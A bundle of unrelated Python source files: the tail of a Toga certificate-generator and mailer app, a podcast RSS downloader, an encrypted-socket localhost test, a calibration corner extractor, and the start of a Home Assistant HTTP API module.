"x : 0", id=f"stx_{self.bnd_box}", style=Pack(padding=5, width=45)
)
sty = toga.Label(
"y : 0", id=f"sty_{self.bnd_box}", style=Pack(padding=5, width=45)
)
stx_in = toga.Slider(
id=f"stxin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_width),
on_slide=self.teleport,
)
sty_in = toga.Slider(
id=f"styin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_height),
on_slide=self.teleport,
)
stborder_line = toga.Divider(
id=f"bhst_{self.bnd_box}",
style=Pack(padding=5, height=2, width=100, flex=1),
)
mtl = toga.Label(
"Medium Text Length : 0 chars",
id=f"mtl_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=200),
)
mtl_in = toga.Slider(
id=f"mtlin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 255),
on_slide=self.teleport,
)
mts = toga.Label(
"Medium Font Size : 0 pts",
id=f"mts_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=160),
)
mts_in = toga.Slider(
id=f"mtsin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 100),
on_slide=self.teleport,
)
mtx = toga.Label(
"x : 0", id=f"mtx_{self.bnd_box}", style=Pack(padding=5, width=45)
)
mty = toga.Label(
"y : 0", id=f"mty_{self.bnd_box}", style=Pack(padding=5, width=45)
)
mtx_in = toga.Slider(
id=f"mtxin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_width),
on_slide=self.teleport,
)
mty_in = toga.Slider(
id=f"mtyin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_height),
on_slide=self.teleport,
)
mtborder_line = toga.Divider(
id=f"bhmt_{self.bnd_box}", style=Pack(padding=5, height=5, flex=1)
)
ltl = toga.Label(
"Large Text Length : 0 chars",
id=f"ltl_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=190),
)
ltl_in = toga.Slider(
id=f"ltlin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 255),
on_slide=self.teleport,
)
lts = toga.Label(
"Large Font Size : 0 pts",
id=f"lts_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=150),
)
lts_in = toga.Slider(
id=f"ltsin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 100),
on_slide=self.teleport,
)
ltx = toga.Label(
"x : 0", id=f"ltx_{self.bnd_box}", style=Pack(padding=5, width=45)
)
lty = toga.Label(
"y : 0", id=f"lty_{self.bnd_box}", style=Pack(padding=5, width=45)
)
ltx_in = toga.Slider(
id=f"ltxin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_width),
on_slide=self.teleport,
)
lty_in = toga.Slider(
id=f"ltyin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_height),
on_slide=self.teleport,
)
ltborder_line = toga.Divider(
id=f"bhlt_{self.bnd_box}", style=Pack(padding=5, height=5, flex=1)
)
box.add(
label,
self.text_list[self.bnd_box],
table_label,
stl,
stl_in,
sts,
sts_in,
stx,
stx_in,
sty,
sty_in,
stborder_line,
mtl,
mtl_in,
mts,
mts_in,
mtx,
mtx_in,
mty,
mty_in,
mtborder_line,
ltl,
ltl_in,
lts,
lts_in,
ltx,
ltx_in,
lty,
lty_in,
ltborder_line,
)
box_border_line = toga.Divider(
id=f"bv_{self.bnd_box}", direction=toga.Divider.VERTICAL
)
self.coord.update(
{
self.bnd_box: {
"st": {"x": 0, "y": 0, "fs": 0, "tl": 0},
"mt": {"x": 0, "y": 0, "fs": 0, "tl": 0},
"lt": {"x": 0, "y": 0, "fs": 0, "tl": 0},
"th": "",
}
}
)
self.name_box.add(box, box_border_line)
self.bnd_box += 1
self.name_scroller.content = self.name_box
else:
self.fetch(widget)
def teleport(self, widget, row=None):
if len(self.image_file_name) != 0 and len(self.font_file_name):
key = int(widget.id.split("_")[-1]) if "_" in widget.id else 0
value = (
int(widget.value)
if (row == None and "." in str(widget.value))
else row.__dict__
if row != None
else widget.value
)
boxes = self.name_box.children
change = False
size = None
(
stx_label,
sty_label,
mtx_label,
mty_label,
ltx_label,
lty_label,
stl_label,
mtl_label,
ltl_label,
sts_label,
mts_label,
lts_label,
) = (None, None, None, None, None, None, None, None, None, None, None, None)
for box in boxes:
ctrls = box.children
for _label in ctrls:
if _label.id == f"stx_{key}":
stx_label = _label
elif _label.id == f"sty_{key}":
sty_label = _label
elif _label.id == f"mtx_{key}":
mtx_label = _label
elif _label.id == f"mty_{key}":
mty_label = _label
elif _label.id == f"ltx_{key}":
ltx_label = _label
elif _label.id == f"lty_{key}":
lty_label = _label
elif _label.id == f"stl_{key}":
stl_label = _label
elif _label.id == f"mtl_{key}":
mtl_label = _label
elif _label.id == f"ltl_{key}":
ltl_label = _label
elif _label.id == f"sts_{key}":
sts_label = _label
elif _label.id == f"mts_{key}":
mts_label = _label
elif _label.id == f"lts_{key}":
lts_label = _label
if widget.id.startswith("stxin") and self.coord[key]["st"]["x"] != value:
if stx_label != None:
stx_label.text = f"x : {value}"
self.coord[key]["st"]["x"] = value
size = "st"
change = True
elif widget.id.startswith("styin") and self.coord[key]["st"]["y"] != value:
if sty_label != None:
sty_label.text = f"y : {value}"
self.coord[key]["st"]["y"] = value
size = "st"
change = True
elif widget.id.startswith("mtxin") and self.coord[key]["mt"]["x"] != value:
if mtx_label != None:
mtx_label.text = f"x : {value}"
self.coord[key]["mt"]["x"] = value
size = "mt"
change = True
elif widget.id.startswith("mtyin") and self.coord[key]["mt"]["y"] != value:
if mty_label != None:
mty_label.text = f"y : {value}"
self.coord[key]["mt"]["y"] = value
size = "mt"
change = True
elif widget.id.startswith("ltxin") and self.coord[key]["lt"]["x"] != value:
if ltx_label != None:
ltx_label.text = f"x : {value}"
self.coord[key]["lt"]["x"] = value
size = "lt"
change = True
elif widget.id.startswith("ltyin") and self.coord[key]["lt"]["y"] != value:
if lty_label != None:
lty_label.text = f"y : {value}"
self.coord[key]["lt"]["y"] = value
size = "lt"
change = True
elif widget.id.startswith("stlin") and self.coord[key]["st"]["tl"] != value:
if stl_label != None:
stl_label.text = f"Small Text Length : {value} chars"
self.coord[key]["st"]["tl"] = value
elif widget.id.startswith("mtlin") and self.coord[key]["mt"]["tl"] != value:
if mtl_label != None:
mtl_label.text = f"Medium Text Length : {value} chars"
self.coord[key]["mt"]["tl"] = value
elif widget.id.startswith("ltlin") and self.coord[key]["lt"]["tl"] != value:
if ltl_label != None:
ltl_label.text = f"Long Text Length : {value} chars"
self.coord[key]["lt"]["tl"] = value
elif widget.id.startswith("stsin") and self.coord[key]["st"]["fs"] != value:
if sts_label != None:
sts_label.text = f"Small Font Size : {value} pts"
self.coord[key]["st"]["fs"] = value
size = "st"
change = True
elif widget.id.startswith("mtsin") and self.coord[key]["mt"]["fs"] != value:
if mts_label != None:
mts_label.text = f"Medium Font Size : {value} pts"
self.coord[key]["mt"]["fs"] = value
size = "mt"
change = True
elif widget.id.startswith("ltsin") and self.coord[key]["lt"]["fs"] != value:
if lts_label != None:
lts_label.text = f"Long Font Size : {value} pts"
self.coord[key]["lt"]["fs"] = value
size = "lt"
change = True
elif widget.id.startswith("tbl") and self.coord[key]["th"] != value:
self.coord[key]["th"] = str(value)
elif widget.id == "sheet":
for place_holder, l_index in zip(self.text_list, self.coord):
if self.coord[l_index]["th"] != "":
place_holder.value = value[
self.headings[self.coord[l_index]["th"]]
]
change = True
key = l_index
self.name_box.refresh()
self.update_canvas(change, key, size)
def update_canvas(self, change, key, size=None):
if change and len(self.text_list[key].value) > 0:
img = Image.open(self.image_file_name)
new_image = ImageDraw.Draw(img)
for _key in self.coord:
if _key == key and size is not None:
font_face = ImageFont.truetype(
self.font_file_name, self.coord[_key][size]["fs"]
)
new_image.text(
[self.coord[_key][size]["x"], self.coord[_key][size]["y"]],
self.text_list[_key].value,
font=font_face,
)
else:
font_face = ImageFont.truetype(
self.font_file_name, self.coord[_key]["mt"]["fs"]
)
new_image.text(
[self.coord[_key]["mt"]["x"], self.coord[_key]["mt"]["y"]],
self.text_list[_key].value,
font=font_face,
)
del font_face
img.save(self.tmp_filen)
self.image_view.image = toga.Image(self.tmp_filen)
def get_right_panel(self):
right_panel = toga.Box(style=Pack(flex=1, direction=COLUMN))
if self.csv_file_name != "":
with open(self.csv_file_name, "r") as file_object:
reader = csv.reader(file_object)
temp = [row for row in reader]
heading_present = self.main_window.question_dialog(
"CSV File Configuration", "Does the csv file has a heading column ?"
)
if not heading_present:
self.headings = {
f"Column {_index}": f"column_{_index}"
for _index, label in enumerate(temp[0], 1)
}
self.data = temp[0:]
else:
self.headings = {
label: ("_" + label.replace(" ", "_")).lower()
if " " in label
else ("_" + label).lower()
for label in temp[0]
}
self.data = temp[1:]
csv_widget = toga.Table(
id="sheet",
headings=list(self.headings.keys()),
data=self.data,
style=Pack(flex=1, padding=5),
on_select=self.teleport,
accessors=list(self.headings.values()),
)
for box in self.name_box.children:
ctrls = box.children
for _label in ctrls:
if _label.id.startswith("tbl_"):
_label.items = [""] + list(self.headings.keys())
_label.enabled = True
if _label.id.startswith("lin_"):
_label.value = ""
self.write_certificate.enabled = True
else:
csv_widget = toga.Table(
id="sheet", headings=[], style=Pack(flex=1, padding=5)
)
right_panel.add(csv_widget)
self.csv_window.content = right_panel
self.csv_window.show()
def write_interface(self, widget):
message = "Writing Options"
self.consolidated = {}
# confirm the label headers
for _index in self.coord:
consolidated = {}
message += f"\nLabel {_index+1} "
for _key in self.coord[_index]:
if _key != "th" and self.coord[_index][_key]["fs"] == 0:
continue
if _key == "th" and (
self.coord[_index]["st"]["fs"] != 0
or self.coord[_index]["mt"]["fs"] != 0
or self.coord[_index]["lt"]["fs"] != 0
):
consolidated.update(
{
_key: list(self.headings.keys()).index(
self.coord[_index][_key]
)
}
)
message += (
f"\n\t-> {self.content[_key]} : {self.coord[_index][_key]}"
)
continue
else:
consolidated.update({_key: self.coord[_index][_key]})
message += f"\n\t-> Category : {self.content[_key]}"
for _sub_key in self.coord[_index][_key]:
message += f"\n\t\t-> {self.content[_sub_key]} : {self.coord[_index][_key][_sub_key]}"
message += "\n"
self.consolidated.update({_index: consolidated})
go_ahead = self.main_window.confirm_dialog(
title="Write Conform", message=message
)
if go_ahead:
self.destination_folder = self.main_window.select_folder_dialog(
title="Select destination folder"
)
self.destination_folder = self.destination_folder[0]
# self.thread = Thread(target=self.write_certificates, daemon=True)
# self.thread.start()
self.write_certificates()
if self.csv_log_file_name != "":
self.get_mail_window(None)
def write_certificates(self):
to_write = {}
self.csv_log_file_name = ""
logs = []
flag = False
self.loading.max = len(self.data)
self.loading.start()
for sno, row in enumerate(self.data, 1):
to_write = {
_label: row[self.consolidated[_label]["th"]]
for _label in self.consolidated
}
image = Image.open(self.image_file_name)
new_image = ImageDraw.Draw(image)
for label in to_write:
font_face = ""
# build cases
if (
"st" in self.consolidated[label].keys()
and len(to_write[label]) <= self.consolidated[label]["st"]["tl"]
):
font_face = ImageFont.truetype(
self.font_file_name, self.consolidated[label]["st"]["fs"]
)
new_image.text(
[
self.consolidated[label]["st"]["x"],
self.consolidated[label]["st"]["y"],
],
to_write[label],
font=font_face,
)
if (
"mt" in self.consolidated[label].keys()
and self.consolidated[label]["st"]["tl"]
< len(to_write[label])
<= self.consolidated[label]["mt"]["tl"]
):
font_face = ImageFont.truetype(
self.font_file_name, self.consolidated[label]["mt"]["fs"]
)
new_image.text(
[
self.consolidated[label]["mt"]["x"],
self.consolidated[label]["mt"]["y"],
],
to_write[label],
font=font_face,
)
if (
"lt" in self.consolidated[label].keys()
and self.consolidated[label]["mt"]["tl"]
< len(to_write[label])
<= self.consolidated[label]["lt"]["tl"]
):
font_face = ImageFont.truetype(
self.font_file_name, self.consolidated[label]["lt"]["fs"]
)
new_image.text(
[
self.consolidated[label]["lt"]["x"],
self.consolidated[label]["lt"]["y"],
],
to_write[label],
font=font_face,
)
del font_face
fn = f'{sno}.{"_".join(list(to_write.values()))}.png'
written_certificate_name = os.path.join(self.destination_folder, fn)
image.save(written_certificate_name)
temp = row + [os.path.abspath(written_certificate_name)]
logs.append(temp)
self.loading.value = sno
# log to file
if self.csv_file_name != "":
self.csv_log_file_name = (
str(
self.csv_file_name
if self.csv_file_name != ""
else f"temp_{time.ctime()}.csv"
).split(".csv")[0]
+ "_file_log.csv"
)
with open(self.csv_log_file_name, "w") as csv_log_fp:
csv_logger = csv.writer(csv_log_fp)
csv_logger.writerows(logs)
self.loading.stop()
self.loading.value = 0
def get_mail_window(self, widget):
if widget != None:
temp = self.main_window.open_file_dialog(
"Select a csv file with mail ids", file_types=["csv"]
)
if temp is not None:
self.csv_log_file_name = str(temp)
else:
return
go_ahead = self.main_window.question_dialog(
title="SenD Emails",
message=f"Do you want to use mail ids from following file \n{self.csv_log_file_name}",
)
if go_ahead:
with open(self.csv_log_file_name, "r") as file_object:
reader = csv.reader(file_object)
temp = [row for row in reader]
heading_present = self.main_window.question_dialog(
"CSV File Configuration", "Does the csv file has a heading column ?"
)
if not heading_present:
self.email_headings = {
f"Column {_index+1}": _index
for _index, label in enumerate(temp[0], 0)
}
self.email_data = temp
else:
self.email_headings = {
label: _index for _index, label in enumerate(temp[0], 0)
}
self.email_data = temp[1:]
self.mail_id_label = toga.Label(
text="Mail Id : ", id="mail_id", style=Pack(padding=10)
)
self.mail_id_usin = toga.TextInput(
id="mailid_in", style=Pack(padding=10, flex=1)
)
self.mail_id_box = toga.Box(
id="mail_box",
style=Pack(flex=1, padding=5),
children=[self.mail_id_label, self.mail_id_usin],
)
self.mail_pn_label = toga.Label(
text="Profile Name : ", id="mail_pn", style=Pack(padding=10)
)
self.mail_pn_usin = toga.TextInput(
id="mailpn_in", style=Pack(padding=10, flex=1)
)
self.mail_pn_box = toga.Box(
id="mail_box",
style=Pack(flex=1, padding=5),
children=[self.mail_pn_label, self.mail_pn_usin],
)
self.pass_label = toga.Label(
text="Password : ", id="pass", style=Pack(padding=10)
)
self.pass_usin = toga.PasswordInput(
id="pass_in", style=Pack(padding=10, flex=1)
)
self.pass_box = toga.Box(
id="pass_box",
style=Pack(flex=1, padding=5),
children=[self.pass_label, self.pass_usin],
)
self.sub_label = toga.Label(
text="Subject : ", id="subject", style=Pack(padding=10)
)
self.sub_usin = toga.TextInput(id="sub_in", style=Pack(padding=10, flex=1))
self.sub_box = toga.Box(
id="sub_box",
style=Pack(flex=1, padding=5),
children=[self.sub_label, self.sub_usin],
)
self.image_column_index = toga.Selection(
id="image_column_in",
style=Pack(padding=10, flex=1),
items=["Image Column Name"] + list(self.email_headings.keys()),
)
self.email_column_index = toga.Selection(
id="email_column_in",
style=Pack(padding=10, flex=1),
items=["Email Column Name"] + list(self.email_headings.keys()),
)
self.mess_usin = toga.MultilineTextInput(
id="mess_in", style=Pack(padding=10, flex=1), initial="Content of mail"
)
self.email_pb = toga.ProgressBar(
id="email_pb", style=Pack(padding=10, flex=1)
)
self.sm_button = toga.Button(
label="Send Mail",
id="sendmail",
style=Pack(padding=10, flex=1),
on_press=self.send_mail,
)
self.st_button = toga.Button(
label="Send Test Mail",
id="sendtestmail",
style=Pack(padding=10, flex=1),
on_press=self.send_mail,
)
self.cm_button = toga.Button(
label="Cancel",
id="cancelmail",
style=Pack(padding=10, flex=1),
on_press=self.send_mail,
)
self.mess_box = toga.Box(
id="mess_box",
style=Pack(flex=1, padding=5, direction=COLUMN),
children=[
self.image_column_index,
self.email_column_index,
self.mess_usin,
self.email_pb,
self.sm_button,
self.st_button,
self.cm_button,
],
)
self.mail_content_box = toga.Box(
id="mail_content_box",
style=Pack(direction=COLUMN, flex=1),
children=[
self.mail_pn_box,
self.mail_id_box,
self.pass_box,
self.sub_box,
self.mess_box,
],
)
self.email_window = toga.Window(
id="email_dialog", title="Email Configuration"
)
self.email_window.content = self.mail_content_box
self.email_window.show()
def send_mail(self, widget):
if widget.id.startswith("sendm") or widget.id.startswith("sendt"):
email_index, image_path_index = None, None
if (
not len(self.mail_id_usin.value) > 3
or "@" not in str(self.mail_id_usin.value)
or "." not in str(self.mail_id_usin.value)
):
self.main_window.error_dialog("Mail Id Error", "Enter a valid mail")
return
if not len(self.mail_pn_usin.value) > 2:
self.main_window.error_dialog(
"Profile Name Error", "Profile name not typed"
)
return
if not len(self.pass_usin.value) > 5:
self.main_window.error_dialog("Password Error", "Password not typed")
return
if not len(self.sub_usin.value) > 1:
self.main_window.error_dialog("Subject Error", "Subject not typed")
return
if not len(self.sub_usin.value) > 2:
self.main_window.error_dialog(
"Mail Content Error", "Mail content not typed"
)
return
if str(self.email_column_index.value) == "Email Column Name":
self.main_window.error_dialog(
"Email Column Name Error", "Email column not selected"
)
return
else:
email_index = self.email_headings[str(self.email_column_index.value)]
if str(self.image_column_index.value) != "Image Column Name":
image_path_index = self.email_headings[
str(self.image_column_index.value)
]
self.loading.max = len(self.email_data)
mailer = Mailer(
usr=self.mail_id_usin.value,
profile=self.mail_pn_usin.value,
psk=self.pass_usin.value,
)
time.sleep(20)
if mailer.mailer is not None:
if widget.id.startswith("sendtest"):
image_path = (
None
if image_path_index is None
else self.email_data[0][image_path_index]
)
print(
self.mail_id_usin.value,
self.sub_usin.value,
self.mess_usin.value,
image_path,
)
feedback = mailer.send_mail(
self.mail_id_usin.value,
self.sub_usin.value,
self.mess_usin.value,
image_path,
)
self.main_window.info_dialog(
"Mail Log",
f"A {feedback[0]} to {self.mail_id_usin.value} at {feedback[1]}",
)
return
elif widget.id.startswith("sendma"):
self.email_pb.max = len(self.email_data)
self.email_pb.start()
logs = []
for row in self.email_data:
feedback = mailer.send_mail(
(row[email_index]).strip(),
self.sub_usin.value,
self.mess_usin.value,
None if image_path_index is None else row[image_path_index],
)
logs.append(row + feedback)
self.email_pb.value = self.email_data.index(row) + 1
time.sleep(1)
self.email_pb.stop()
self.email_pb.value = 0
mail_log = (
self.csv_log_file_name.split(".csv")[0]
+ f"_maillogs_{time.ctime()}.csv"
)
with open(mail_log, "w") as file_object:
writer = csv.writer(file_object)
writer.writerows(logs)
self.main_window.info_dialog(
title="Mail Log",
message=f"The mail logs is available in {mail_log}",
)
mailer.mailer.quit()
else:
self.main_window.error_dialog(
"Mail Service Error",
"Please check the mailid, password & internet connection",
)
return
elif widget.id.startswith("cancelm"):
self.email_window.close()
def main():
return CertificAtor()
|
sysk.py
|
import os
import logging
import subprocess
import sys
import feedparser
import collections
import threading
from atexit import register
import time
import requests
import json
from myutils import query_config, replace_invalid_filename_char
logger = logging.getLogger('pystuff')
class Podcast:
def __init__(self,title,summary,link,publishdate,downloadresult):
self.Title = title
self.Summary = summary
self.Link = link
self.PublishDate = time.strftime("%Y-%m-%d %H:%M:%S",publishdate)
self.DownloadResult = downloadresult
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__)
def fetchRss(rss):
feeds = []
def mightTimeout():
logger.info("feedparser from %s",rss)
source = feedparser.parse(rss)
for s in source.entries:
link = ''
for l in s.links:
if (l['type'] == 'audio/mpeg'):
link = l['href']
break
if not link:
continue
#feeds.append(Pocast(s.title, s.subtitle, link, time.strftime("%Y-%m-%d %H:%M:%S",s.published_parsed,''))
feeds.append(Podcast(s.title, s.summary, link,s.published_parsed,''))
logger.info("complete feedparser within 10s")
t = threading.Thread(target=mightTimeout)
t.setDaemon(True)
t.start()
logger.info("waiting....")
t.join(20)
logger.info("whatever....")
return feeds[:100]
def whatsNew(feeds, localpath):
newpocast = []
exfile = []
# 拆包,没有用的元素用_代替
for _, _, files in os.walk(localpath):
for name in files:
if '.' not in name:
continue
if os.path.splitext(name)[1] == '.mp3':
exfile.append(name)
break
for rs in feeds:
ex = False
for f in exfile:
if(f.find(replace_invalid_filename_char(rs.Title)) >= 0):
ex = True
break
if(ex == False):
newpocast.append(rs)
return newpocast
def downloadOnePocast(rss, localpath):
'''return file path, may excepetion'''
result = ''
encodedName = replace_invalid_filename_char(rss.Title)
filepath = '%s/%s.mp3' % (localpath, encodedName)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'
}
print('downloading from: '+rss.Link)
r = requests.get(rss.Link,headers=headers, stream=True) # create HTTP response object
with open(filepath,'wb') as f:
for chunk in r.iter_content(chunk_size=4096):
if chunk:
f.write(chunk)
result = filepath
return result
def downloadOnePocastUsingAria2(rss, localpath):
'''return file path, may excepetion'''
result = ''
encodedName = replace_invalid_filename_char(rss.Title)
filepath = '%s/%s.mp3' % (localpath, encodedName)
logger.info("user aria2 downloading: %s"%rss.Link)
ret = subprocess.call(["aria2c","-o",filepath,rss.Link])
logger.info(ret)
result = filepath
return result
'''
def updateLocalPocastList(podcasts:list, downloadpath:str):
for p in podcasts:
if p.DownloadResult:
continue
encodedName = replace_invalid_filename_char(p.Title)
filepath = '%s/%s.mp3' % (downloadpath, encodedName)
if os.path.exists(filepath):
p.DownloadResult = filepath
redis_config = query_config('redis_connection')
conn = redis.Redis(host=redis_config['host'],port=6379,password=redis_config['password'],decode_responses=True)
conn.delete('podcasts')
pipe = conn.pipeline()
for p in podcasts:
pipe.rpush('podcasts',p.toJSON())
pipe.execute()
'''
def checkAndDownloadPodcasts(url, downloadpath, maxcount=1):
print('hello, fetching new podcasts....')
if not os.path.exists(downloadpath):
os.makedirs(downloadpath)
podcasts = fetchRss(url)
#updateLocalPocastList(podcasts, downloadpath)
print("recive %s podcasts" % (len(podcasts)))
newfeeds = whatsNew(podcasts, downloadpath)
newfeedsLen = len(newfeeds)
print("found %s new podcasts" % (newfeedsLen))
downloadResult = []
while maxcount > 0:
maxcount = maxcount-1
todo = newfeeds[maxcount]
oneResult = downloadOnePocast(todo, downloadpath)
downloadResult.append((todo.Title,todo.Link,oneResult))
#updateLocalPocastList(podcasts, downloadpath)
return downloadResult
def main():
url = 'https://feeds.megaphone.fm/stuffyoushouldknow'
checkAndDownloadPodcasts(url, 'downloads/sysk')
if(__name__ == '__main__'):
main()
@register
def _atexit():
# 脚本退出前执行这个函数
print('sysk srcript end at ' + time.ctime())
|
test_external.py
|
import os
from hks_pylib.logger.standard import StdUsers
from hks_pylib.logger import Display
import random
import threading
from hks_pynetwork.external import STCPSocket
from hks_pylib.cryptography.ciphers.symmetrics import AES_CTR, AES_CBC
from hks_pylib.logger import StandardLoggerGenerator
logger_generator = StandardLoggerGenerator("tests/test_external.log")
KEY = os.urandom(32)
N_SAMPLE_DATA = random.randint(10, 20)
CLIENT_SAMPLE_DATA_LIST = [os.urandom(random.randint(100, 200)) for _ in range(N_SAMPLE_DATA)]
SERVER_SAMPLE_DATA_LIST = [os.urandom(random.randint(100, 200)) for _ in range(N_SAMPLE_DATA)]
def server():
server = STCPSocket(
cipher=AES_CTR(KEY),
name="Server",
buffer_size=1024,
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL}
)
server.bind(("127.0.0.1", 9999))
server.listen()
socket, addr = server.accept()
err = None
for client_data, server_data in zip(CLIENT_SAMPLE_DATA_LIST, SERVER_SAMPLE_DATA_LIST):
data = socket.recv()
if data != client_data:
err = "SERVER ERROR DATA NOT MATCH"
break
socket.send(server_data)
socket.close()
if err:
raise Exception(err)
socket.close()
def client():
client = STCPSocket(
cipher=AES_CTR(KEY),
name="Client",
buffer_size=1024,
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL}
)
client.connect(("127.0.0.1", 9999))
err = None
for client_data, server_data in zip(CLIENT_SAMPLE_DATA_LIST, SERVER_SAMPLE_DATA_LIST):
client.send(client_data)
data = client.recv()
if data != server_data:
err = "ERROR CLIENT DATA NOT MATCH"
break
client.close()
if err:
raise Exception(err)
def test_client_server():
t1 = threading.Thread(target=server)
t1.start()
t2 = threading.Thread(target=client)
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
client()
|
TargetExtractor.py
|
import sm
import numpy as np
import sys
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue # python 2.x
import time
import copy
import cv2
def multicoreExtractionWrapper(detector, taskq, resultq, clearImages, noTransformation):
while 1:
try:
task = taskq.get_nowait()
except queue.Empty:
return
idx = task[0]
stamp = task[1]
image = task[2]
if noTransformation:
success, obs = detector.findTargetNoTransformation(stamp, np.array(image))
else:
success, obs = detector.findTarget(stamp, np.array(image))
if clearImages:
obs.clearImage()
if success:
resultq.put( (obs, idx) )
def extractCornersFromDataset(dataset, detector, multithreading=False, numProcesses=None, clearImages=True, noTransformation=False):
print("Extracting calibration target corners")
targetObservations = []
numImages = dataset.numImages()
# prepare progess bar
iProgress = sm.Progress2(numImages)
iProgress.sample()
if multithreading:
if not numProcesses:
numProcesses = max(1,multiprocessing.cpu_count()-1)
try:
manager = multiprocessing.Manager()
resultq = manager.Queue()
manager2 = multiprocessing.Manager()
taskq = manager2.Queue()
for idx, (timestamp, image) in enumerate(dataset.readDataset()):
taskq.put( (idx, timestamp, image) )
plist=list()
for pidx in range(0, numProcesses):
detector_copy = copy.copy(detector)
p = multiprocessing.Process(target=multicoreExtractionWrapper, args=(detector_copy, taskq, resultq, clearImages, noTransformation, ))
p.start()
plist.append(p)
#wait for results
last_done=0
while 1:
if all([not p.is_alive() for p in plist]):
time.sleep(0.1)
break
done = numImages-taskq.qsize()
sys.stdout.flush()
if (done-last_done) > 0:
iProgress.sample(done-last_done)
last_done = done
time.sleep(0.5)
resultq.put('STOP')
except Exception as e:
raise RuntimeError("Exception during multithreaded extraction: {0}".format(e))
#get result sorted by time (=idx)
if resultq.qsize() > 1:
targetObservations = [[]]*(resultq.qsize()-1)
for lidx, data in enumerate(iter(resultq.get, 'STOP')):
obs=data[0]; time_idx = data[1]
targetObservations[lidx] = (time_idx, obs)
targetObservations = list(zip(*sorted(targetObservations, key=lambda tup: tup[0])))[1]
else:
targetObservations=[]
#single threaded implementation
else:
for timestamp, image in dataset.readDataset():
if noTransformation:
success, observation = detector.findTargetNoTransformation(timestamp, np.array(image))
else:
success, observation = detector.findTarget(timestamp, np.array(image))
if clearImages:
observation.clearImage()
if success == 1:
targetObservations.append(observation)
iProgress.sample()
if len(targetObservations) == 0:
print("\r")
sm.logFatal("No corners could be extracted for camera {0}! Check the calibration target configuration and dataset.".format(dataset.topic))
else:
print("\r Extracted corners for %d images (of %d images) " % (len(targetObservations), numImages))
#close all opencv windows that might be open
cv2.destroyAllWindows()
return targetObservations
|
http.py
|
"""
homeassistant.components.httpinterface
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides an API and a HTTP interface for debug purposes.
By default it will run on port 8123.
All API calls have to be accompanied by an 'api_password' parameter and will
return JSON. If successful calls will return status code 200 or 201.
Other status codes that can occur are:
- 400 (Bad Request)
- 401 (Unauthorized)
- 404 (Not Found)
- 405 (Method not allowed)
The api supports the following actions:
/api - GET
Returns message if API is up and running.
Example result:
{
"message": "API running."
}
/api/states - GET
Returns a list of entities for which a state is available
Example result:
[
{ .. state object .. },
{ .. state object .. }
]
/api/states/<entity_id> - GET
Returns the current state from an entity
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"entity_id": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/states/<entity_id> - POST
Updates the current state of an entity. Returns status code 201 if successful
with location header of updated resource and as body the new state.
parameter: new_state - string
optional parameter: attributes - JSON encoded object
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"entity_id": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/events/<event_type> - POST
Fires an event with event_type
optional parameter: event_data - JSON encoded object
Example result:
{
"message": "Event download_file fired."
}
"""
import json
import threading
import logging
import time
import gzip
import os
import random
import string
from datetime import timedelta
from homeassistant.util import Throttle
from http.server import SimpleHTTPRequestHandler, HTTPServer
from http import cookies
from socketserver import ThreadingMixIn
from urllib.parse import urlparse, parse_qs
import homeassistant as ha
from homeassistant.const import (
SERVER_PORT, CONTENT_TYPE_JSON,
HTTP_HEADER_HA_AUTH, HTTP_HEADER_CONTENT_TYPE, HTTP_HEADER_ACCEPT_ENCODING,
HTTP_HEADER_CONTENT_ENCODING, HTTP_HEADER_VARY, HTTP_HEADER_CONTENT_LENGTH,
HTTP_HEADER_CACHE_CONTROL, HTTP_HEADER_EXPIRES, HTTP_OK, HTTP_UNAUTHORIZED,
HTTP_NOT_FOUND, HTTP_METHOD_NOT_ALLOWED, HTTP_UNPROCESSABLE_ENTITY)
import homeassistant.remote as rem
import homeassistant.util as util
import homeassistant.util.dt as date_util
import homeassistant.bootstrap as bootstrap
DOMAIN = "http"
DEPENDENCIES = []
CONF_API_PASSWORD = "api_password"
CONF_SERVER_HOST = "server_host"
CONF_SERVER_PORT = "server_port"
CONF_DEVELOPMENT = "development"
CONF_SESSIONS_ENABLED = "sessions_enabled"
DATA_API_PASSWORD = 'api_password'
# Throttling time in seconds for expired sessions check
MIN_SEC_SESSION_CLEARING = timedelta(seconds=20)
SESSION_TIMEOUT_SECONDS = 1800
SESSION_KEY = 'sessionId'
_LOGGER = logging.getLogger(__name__)
def setup(hass, config=None):
""" Sets up the HTTP API and debug interface. """
if config is None or DOMAIN not in config:
config = {DOMAIN: {}}
api_password = util.convert(config[DOMAIN].get(CONF_API_PASSWORD), str)
no_password_set = api_password is None
if no_password_set:
api_password = util.get_random_string()
# If no server host is given, accept all incoming requests
server_host = config[DOMAIN].get(CONF_SERVER_HOST, '0.0.0.0')
